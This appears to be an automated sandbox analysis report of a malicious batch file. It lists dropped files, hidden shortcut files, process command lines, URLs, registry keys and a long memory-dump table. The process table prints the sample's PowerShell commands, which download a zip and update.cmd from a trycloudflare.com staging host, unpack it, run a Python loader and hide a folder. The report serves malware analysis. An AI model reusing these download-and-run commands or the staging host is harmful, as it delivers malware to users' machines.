Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
ZtefPP1HI7.cmd
|
DOS batch file, ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x217a6b7b, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndwij5o4.gvl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnxf5gxa.tuk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1xhi5dg.kpv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3jcahg5.kk3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4remje3.sw3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xltgndgt.z2e.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yufkvzzs.cpo.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjo22bxe.ccp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:45:55 2024, atime=Wed Sep 27 08:36:55
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:45:55 2024, atime=Wed Sep 27 08:36:55
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:56:51 2023, atime=Wed Sep 27 08:36:55
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:45:55 2024, atime=Wed Sep 27 08:36:55
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:45:55 2024, atime=Wed Sep 27 08:36:55
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:45:55 2024, atime=Wed Sep 27 08:36:55
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 10 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZtefPP1HI7.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest
-Uri 'https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zip' -OutFile 'C:\Users\user\Downloads\jnk8ai.zip'
}"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\jnk8ai.zip' -DesusertionPath 'C:\Users\user\Downloads'
-Force }"
|
|
|
|
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
|
python.exe hey.py
|
|
|
|
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
|
python.exe loader.py
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest
-Uri 'https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmd' -OutFile 'C:\Users\user\Downloads\update.cmd'
}"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://spectrum-exactly-knitting-rural.trycloudflare.com/policy.pdf
|
||
|
C:\Windows\System32\timeout.exe
|
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2584 --field-trial-handle=2392,i,6131583627039465295,1302718975251909702,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://spectrum-exactly-knitting-rural.trycloudflare.com/a.pdf
|
||
|
C:\Windows\System32\timeout.exe
|
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,15215304549136021077,16069531539284027564,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Windows\System32\attrib.exe
|
attrib +h "C:\Users\user\Downloads\Python"
|
There are 5 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmd
|
unknown
|
|
|
|
https://spectrum-exactly-knitting-rural.trycloudflare.com
|
unknown
|
|
|
|
https://spectrum-exactly-knitting-rural.trycloudflare
|
unknown
|
|
|
|
https://spectrum-exactly-knitting-rural.trycloudflare.
|
unknown
|
|
|
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zip
|
unknown
|
|
|
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/policy.pdf
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zip/N
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmd?Nr
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/a.pdf
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zip%NL
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zips
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmdCommonProgramFiles=C
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmdX
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmdCommonProgramFiles=C:
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/22spectrum-exactly-knitting-rural.trycloud
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zipA~
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zipO
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmdH
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zipLMEM
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod-C:
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zipX
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2-C:
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/jnk8ai.zipV
|
unknown
|
||
|
https://spectrum-exactly-knitting-rural.trycloudflare.com/update.cmdx
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 26 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
spectrum-exactly-knitting-rural.trycloudflare.com
|
unknown
|
|
|
|
s-part-0014.t-0009.t-msedge.net
|
13.107.246.42
|
||
|
google.com
|
142.250.184.206
|
||
|
www.google.com
|
142.250.184.228
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
192.168.2.9
|
unknown
|
unknown
|
||
|
142.250.184.228
|
www.google.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FF8793D1000
|
trusted library allocation
|
page read and write
|
||
|
1D0F3FF5000
|
trusted library allocation
|
page read and write
|
||
|
EB235CE000
|
stack
|
page read and write
|
||
|
1EB25410000
|
trusted library section
|
page readonly
|
||
|
1D291FF000
|
stack
|
page read and write
|
||
|
7FF8794B0000
|
trusted library allocation
|
page read and write
|
||
|
1EB24400000
|
heap
|
page read and write
|
||
|
1EB29A40000
|
trusted library allocation
|
page read and write
|
||
|
2AECAE30000
|
heap
|
page read and write
|
||
|
1EB2990A000
|
heap
|
page read and write
|
||
|
3605F7E000
|
stack
|
page read and write
|
||
|
1D292FE000
|
stack
|
page read and write
|
||
|
2AECC523000
|
trusted library allocation
|
page read and write
|
||
|
236BDE62000
|
heap
|
page read and write
|
||
|
1EB2990E000
|
heap
|
page read and write
|
||
|
7FF8793EA000
|
trusted library allocation
|
page read and write
|
||
|
EB23EFE000
|
stack
|
page read and write
|
||
|
EB2494E000
|
stack
|
page read and write
|
||
|
1D28DFD000
|
stack
|
page read and write
|
||
|
209161D0000
|
heap
|
page read and write
|
||
|
412E7C000
|
stack
|
page read and write
|
||
|
5F7F1A7000
|
stack
|
page read and write
|
||
|
2AEE4AF7000
|
heap
|
page read and write
|
||
|
1EB29A73000
|
trusted library allocation
|
page read and write
|
||
|
2AECCA0A000
|
trusted library allocation
|
page read and write
|
||
|
2AECAE50000
|
heap
|
page read and write
|
||
|
1D0E20F2000
|
heap
|
page read and write
|
||
|
1D28EFE000
|
stack
|
page read and write
|
||
|
7FF87923B000
|
trusted library allocation
|
page read and write
|
||
|
17FF31D0000
|
heap
|
page read and write
|
||
|
7FF879240000
|
trusted library allocation
|
page read and write
|
||
|
2AEDC981000
|
trusted library allocation
|
page read and write
|
||
|
1EB2442B000
|
heap
|
page read and write
|
||
|
360557E000
|
stack
|
page read and write
|
||
|
1D0FC0EC000
|
heap
|
page read and write
|
||
|
A4D17FD000
|
stack
|
page read and write
|
||
|
236BDE2B000
|
heap
|
page read and write
|
||
|
2AEE4D40000
|
heap
|
page read and write
|
||
|
1D0E22B6000
|
heap
|
page read and write
|
||
|
1EB29A70000
|
trusted library allocation
|
page read and write
|
||
|
7FF8793F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EB297B0000
|
trusted library allocation
|
page read and write
|
||
|
1EB29A84000
|
trusted library allocation
|
page read and write
|
||
|
1D28C7E000
|
stack
|
page read and write
|
||
|
1D0E2263000
|
trusted library allocation
|
page read and write
|
||
|
1D0E4BB1000
|
trusted library allocation
|
page read and write
|
||
|
36048FD000
|
stack
|
page read and write
|
||
|
1EB243A0000
|
trusted library section
|
page read and write
|
||
|
1EB29A40000
|
trusted library allocation
|
page read and write
|
||
|
36055FE000
|
unkown
|
page readonly
|
||
|
7FF879570000
|
trusted library allocation
|
page read and write
|
||
|
7FF879400000
|
trusted library allocation
|
page execute and read and write
|
||
|
17FF31D9000
|
heap
|
page read and write
|
||
|
1D0FC260000
|
heap
|
page execute and read and write
|
||
|
7FF8793E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EB25400000
|
trusted library section
|
page readonly
|
||
|
7FF8792D6000
|
trusted library allocation
|
page read and write
|
||
|
360517E000
|
stack
|
page read and write
|
||
|
1EB2984F000
|
heap
|
page read and write
|
||
|
1D0FC180000
|
heap
|
page read and write
|
||
|
2AECAE54000
|
heap
|
page read and write
|
||
|
1F6D2DF0000
|
heap
|
page read and write
|
||
|
36051FE000
|
unkown
|
page readonly
|
||
|
236BDE58000
|
heap
|
page read and write
|
||
|
1EB29B90000
|
trusted library allocation
|
page read and write
|
||
|
2AECAC70000
|
heap
|
page read and write
|
||
|
36049FE000
|
unkown
|
page readonly
|
||
|
1F6D2C50000
|
heap
|
page read and write
|
||
|
236BDE02000
|
heap
|
page read and write
|
||
|
20918002000
|
heap
|
page read and write
|
||
|
17FF4CF0000
|
heap
|
page read and write
|
||
|
1EB2A000000
|
heap
|
page read and write
|
||
|
1EB29861000
|
heap
|
page read and write
|
||
|
EB23CF8000
|
stack
|
page read and write
|
||
|
1EB244BB000
|
heap
|
page read and write
|
||
|
2AECC620000
|
heap
|
page read and write
|
||
|
1D28D7E000
|
stack
|
page read and write
|
||
|
36047FE000
|
unkown
|
page readonly
|
||
|
1EB2448D000
|
heap
|
page read and write
|
||
|
1EB24490000
|
heap
|
page read and write
|
||
|
7FF8792E6000
|
trusted library allocation
|
page read and write
|
||
|
2AEE4A90000
|
heap
|
page read and write
|
||
|
3604AFB000
|
stack
|
page read and write
|
||
|
1EB24E91000
|
trusted library allocation
|
page read and write
|
||
|
7FF8794A0000
|
trusted library allocation
|
page read and write
|
||
|
236BDE13000
|
heap
|
page read and write
|
||
|
2AEE4D98000
|
heap
|
page read and write
|
||
|
17FF4CF5000
|
heap
|
page read and write
|
||
|
1EB2988D000
|
heap
|
page read and write
|
||
|
7FF8793E1000
|
trusted library allocation
|
page read and write
|
||
|
20916060000
|
heap
|
page read and write
|
||
|
1EB29821000
|
heap
|
page read and write
|
||
|
7FF879460000
|
trusted library allocation
|
page read and write
|
||
|
1D0E1F70000
|
heap
|
page read and write
|
||
|
EB2358E000
|
stack
|
page read and write
|
||
|
7FF879480000
|
trusted library allocation
|
page read and write
|
||
|
2AECC4B0000
|
trusted library allocation
|
page read and write
|
||
|
1D0E20D5000
|
heap
|
page read and write
|
||
|
7FF8794B0000
|
trusted library allocation
|
page read and write
|
||
|
1D0FC410000
|
heap
|
page read and write
|
||
|
1D0FC45A000
|
heap
|
page read and write
|
||
|
EB23BF9000
|
stack
|
page read and write
|
||
|
7FF879470000
|
trusted library allocation
|
page read and write
|
||
|
EB2397C000
|
stack
|
page read and write
|
||
|
1D28F7D000
|
stack
|
page read and write
|
||
|
7FF879530000
|
trusted library allocation
|
page read and write
|
||
|
1EB29C00000
|
remote allocation
|
page read and write
|
||
|
7FF879560000
|
trusted library allocation
|
page read and write
|
||
|
7FF879520000
|
trusted library allocation
|
page read and write
|
||
|
2AECDAFD000
|
trusted library allocation
|
page read and write
|
||
|
1D0E3EC0000
|
trusted library allocation
|
page read and write
|
||
|
1EB244FF000
|
heap
|
page read and write
|
||
|
A4D12F7000
|
stack
|
page read and write
|
||
|
1EB29BA0000
|
trusted library allocation
|
page read and write
|
||
|
1D0E2050000
|
heap
|
page read and write
|
||
|
7FF8792D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF879234000
|
trusted library allocation
|
page read and write
|
||
|
7FF879530000
|
trusted library allocation
|
page read and write
|
||
|
1D0F4137000
|
trusted library allocation
|
page read and write
|
||
|
7FF879230000
|
trusted library allocation
|
page read and write
|
||
|
236BDE3D000
|
heap
|
page read and write
|
||
|
36040F7000
|
stack
|
page read and write
|
||
|
3605FFE000
|
unkown
|
page readonly
|
||
|
1D0E22B0000
|
heap
|
page read and write
|
||
|
7FF8794C0000
|
trusted library allocation
|
page read and write
|
||
|
20916202000
|
heap
|
page read and write
|
||
|
1D0E20F6000
|
heap
|
page read and write
|
||
|
EB23D7E000
|
stack
|
page read and write
|
||
|
1D0E3F70000
|
heap
|
page execute and read and write
|
||
|
2AECE2EA000
|
trusted library allocation
|
page read and write
|
||
|
2AECC4C0000
|
heap
|
page readonly
|
||
|
7FF879420000
|
trusted library allocation
|
page execute and read and write
|
||
|
3604CFE000
|
unkown
|
page readonly
|
||
|
1D0FC43A000
|
heap
|
page read and write
|
||
|
1EB2447C000
|
heap
|
page read and write
|
||
|
1EB298C8000
|
heap
|
page read and write
|
||
|
7FF8794D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF879440000
|
trusted library allocation
|
page read and write
|
||
|
2AECC4D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8793DA000
|
trusted library allocation
|
page read and write
|
||
|
1EB24474000
|
heap
|
page read and write
|
||
|
2AECDF74000
|
trusted library allocation
|
page read and write
|
||
|
1F6D13B0000
|
heap
|
page read and write
|
||
|
1EB24513000
|
heap
|
page read and write
|
||
|
1D28CFE000
|
stack
|
page read and write
|
||
|
1D0FC476000
|
heap
|
page read and write
|
||
|
1D0FC0C0000
|
heap
|
page read and write
|
||
|
7FF8793C2000
|
trusted library allocation
|
page read and write
|
||
|
412F7F000
|
stack
|
page read and write
|
||
|
1EB24440000
|
heap
|
page read and write
|
||
|
1D0FC09B000
|
heap
|
page read and write
|
||
|
7FF879520000
|
trusted library allocation
|
page read and write
|
||
|
1D0E21B0000
|
heap
|
page read and write
|
||
|
EB2387F000
|
stack
|
page read and write
|
||
|
36056FE000
|
stack
|
page read and write
|
||
|
2AEE4C37000
|
heap
|
page execute and read and write
|
||
|
EB239FE000
|
stack
|
page read and write
|
||
|
2AECAADE000
|
heap
|
page read and write
|
||
|
2AECAA70000
|
heap
|
page read and write
|
||
|
360527E000
|
stack
|
page read and write
|
||
|
1F6D1280000
|
heap
|
page read and write
|
||
|
1D289FE000
|
stack
|
page read and write
|
||
|
360507E000
|
stack
|
page read and write
|
||
|
1D0E2220000
|
heap
|
page readonly
|
||
|
17FF31B0000
|
heap
|
page read and write
|
||
|
7FF8793D0000
|
trusted library allocation
|
page read and write
|
||
|
1D0E2134000
|
heap
|
page read and write
|
||
|
2AECC981000
|
trusted library allocation
|
page read and write
|
||
|
1D29078000
|
stack
|
page read and write
|
||
|
236BDF02000
|
heap
|
page read and write
|
||
|
2AEE4D9F000
|
heap
|
page read and write
|
||
|
7FF879590000
|
trusted library allocation
|
page read and write
|
||
|
1EB29C00000
|
remote allocation
|
page read and write
|
||
|
36054FE000
|
unkown
|
page readonly
|
||
|
1D0E3FFD000
|
trusted library allocation
|
page read and write
|
||
|
5F7F5FE000
|
stack
|
page read and write
|
||
|
1D289B2000
|
stack
|
page read and write
|
||
|
412EFF000
|
stack
|
page read and write
|
||
|
2AEE4B45000
|
heap
|
page read and write
|
||
|
1EB29854000
|
heap
|
page read and write
|
||
|
7FF879450000
|
trusted library allocation
|
page read and write
|
||
|
3604D7E000
|
stack
|
page read and write
|
||
|
7FF879430000
|
trusted library allocation
|
page read and write
|
||
|
7FF879490000
|
trusted library allocation
|
page read and write
|
||
|
36041FE000
|
unkown
|
page readonly
|
||
|
2AEE4D95000
|
heap
|
page read and write
|
||
|
36044F9000
|
stack
|
page read and write
|
||
|
7FF879550000
|
trusted library allocation
|
page read and write
|
||
|
1D0E22C0000
|
heap
|
page read and write
|
||
|
2AECC630000
|
heap
|
page read and write
|
||
|
36052FE000
|
unkown
|
page readonly
|
||
|
1D28E7E000
|
stack
|
page read and write
|
||
|
1EB24D1A000
|
heap
|
page read and write
|
||
|
7FF879560000
|
trusted library allocation
|
page read and write
|
||
|
2AEE4C30000
|
heap
|
page execute and read and write
|
||
|
1EB2982E000
|
heap
|
page read and write
|
||
|
236BFE02000
|
heap
|
page read and write
|
||
|
236BDDB0000
|
heap
|
page read and write
|
||
|
1EB298F6000
|
heap
|
page read and write
|
||
|
7FF879460000
|
trusted library allocation
|
page read and write
|
||
|
7FF8792EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EB24C15000
|
heap
|
page read and write
|
||
|
20916213000
|
heap
|
page read and write
|
||
|
1EB24502000
|
heap
|
page read and write
|
||
|
2AECE4FA000
|
trusted library allocation
|
page read and write
|
||
|
1D0E5AF9000
|
trusted library allocation
|
page read and write
|
||
|
7FF879550000
|
trusted library allocation
|
page read and write
|
||
|
7FF87927C000
|
trusted library allocation
|
page execute and read and write
|
||
|
236BDE00000
|
heap
|
page read and write
|
||
|
1D2937B000
|
stack
|
page read and write
|
||
|
2AECAB25000
|
heap
|
page read and write
|
||
|
1D0E5BBE000
|
trusted library allocation
|
page read and write
|
||
|
36045FE000
|
unkown
|
page readonly
|
||
|
1EB29A41000
|
trusted library allocation
|
page read and write
|
||
|
7FF8795A0000
|
trusted library allocation
|
page read and write
|
||
|
1EB24492000
|
heap
|
page read and write
|
||
|
1EB29A44000
|
trusted library allocation
|
page read and write
|
||
|
2AECDF78000
|
trusted library allocation
|
page read and write
|
||
|
1EB29B10000
|
trusted library allocation
|
page read and write
|
||
|
7FF8792DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D0F3F91000
|
trusted library allocation
|
page read and write
|
||
|
2AEE4B33000
|
heap
|
page read and write
|
||
|
1EB29911000
|
heap
|
page read and write
|
||
|
1EB2988F000
|
heap
|
page read and write
|
||
|
2091624A000
|
heap
|
page read and write
|
||
|
2AEE4C40000
|
heap
|
page read and write
|
||
|
2AECC520000
|
trusted library allocation
|
page read and write
|
||
|
1EB24390000
|
trusted library allocation
|
page read and write
|
||
|
2AEE4C60000
|
heap
|
page read and write
|
||
|
2AECAA60000
|
heap
|
page read and write
|
||
|
1EB25450000
|
trusted library section
|
page readonly
|
||
|
EB23B76000
|
stack
|
page read and write
|
||
|
1D0FC050000
|
heap
|
page execute and read and write
|
||
|
7FF879540000
|
trusted library allocation
|
page read and write
|
||
|
7DF4C12C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF879250000
|
trusted library allocation
|
page read and write
|
||
|
1EB24479000
|
heap
|
page read and write
|
||
|
1EB24C02000
|
heap
|
page read and write
|
||
|
7FF8794E0000
|
trusted library allocation
|
page read and write
|
||
|
1EB24C00000
|
heap
|
page read and write
|
||
|
1EB29A20000
|
trusted library allocation
|
page read and write
|
||
|
7FF879350000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EB298C1000
|
heap
|
page read and write
|
||
|
1D0F3F81000
|
trusted library allocation
|
page read and write
|
||
|
7FF879540000
|
trusted library allocation
|
page read and write
|
||
|
1D0FC183000
|
heap
|
page read and write
|
||
|
EB24A4D000
|
stack
|
page read and write
|
||
|
2AECAAE8000
|
heap
|
page read and write
|
||
|
EB23503000
|
stack
|
page read and write
|
||
|
1EB25320000
|
trusted library allocation
|
page read and write
|
||
|
7FF879233000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F7F6FD000
|
stack
|
page read and write
|
||
|
2AEDC9F6000
|
trusted library allocation
|
page read and write
|
||
|
2AEE4ADD000
|
heap
|
page read and write
|
||
|
1D0E20FA000
|
heap
|
page read and write
|
||
|
2AEE4D5F000
|
heap
|
page read and write
|
||
|
EB23AFD000
|
stack
|
page read and write
|
||
|
1EB29A80000
|
trusted library allocation
|
page read and write
|
||
|
7FF879306000
|
trusted library allocation
|
page execute and read and write
|
||
|
A4D15FD000
|
stack
|
page read and write
|
||
|
3F4607E000
|
stack
|
page read and write
|
||
|
2AEE4B4D000
|
heap
|
page read and write
|
||
|
2AEE4DB7000
|
heap
|
page read and write
|
||
|
7FF879510000
|
trusted library allocation
|
page read and write
|
||
|
1EB29B90000
|
trusted library allocation
|
page read and write
|
||
|
1EB298F0000
|
heap
|
page read and write
|
||
|
36057FE000
|
unkown
|
page readonly
|
||
|
1EB24260000
|
heap
|
page read and write
|
||
|
1D0E20EC000
|
heap
|
page read and write
|
||
|
1EB29903000
|
heap
|
page read and write
|
||
|
EB23C77000
|
stack
|
page read and write
|
||
|
1EB257B0000
|
trusted library allocation
|
page read and write
|
||
|
2AEE4B7F000
|
heap
|
page read and write
|
||
|
1EB29A30000
|
trusted library allocation
|
page read and write
|
||
|
236BDE6B000
|
heap
|
page read and write
|
||
|
2AECE5C4000
|
trusted library allocation
|
page read and write
|
||
|
2AECAAFE000
|
heap
|
page read and write
|
||
|
1D29D4E000
|
stack
|
page read and write
|
||
|
5F7F8FE000
|
stack
|
page read and write
|
||
|
3604C7E000
|
stack
|
page read and write
|
||
|
1EB29A60000
|
trusted library allocation
|
page read and write
|
||
|
1D0E41B1000
|
trusted library allocation
|
page read and write
|
||
|
5F7F4FE000
|
stack
|
page read and write
|
||
|
1EB29B10000
|
trusted library allocation
|
page read and write
|
||
|
3F45D3C000
|
stack
|
page read and write
|
||
|
7FF879570000
|
trusted library allocation
|
page read and write
|
||
|
1D0E56A4000
|
trusted library allocation
|
page read and write
|
||
|
1EB24D1A000
|
heap
|
page read and write
|
||
|
7FF8792E0000
|
trusted library allocation
|
page read and write
|
||
|
1EB29842000
|
heap
|
page read and write
|
||
|
1D0FC448000
|
heap
|
page read and write
|
||
|
1D28FF9000
|
stack
|
page read and write
|
||
|
2AECAAEC000
|
heap
|
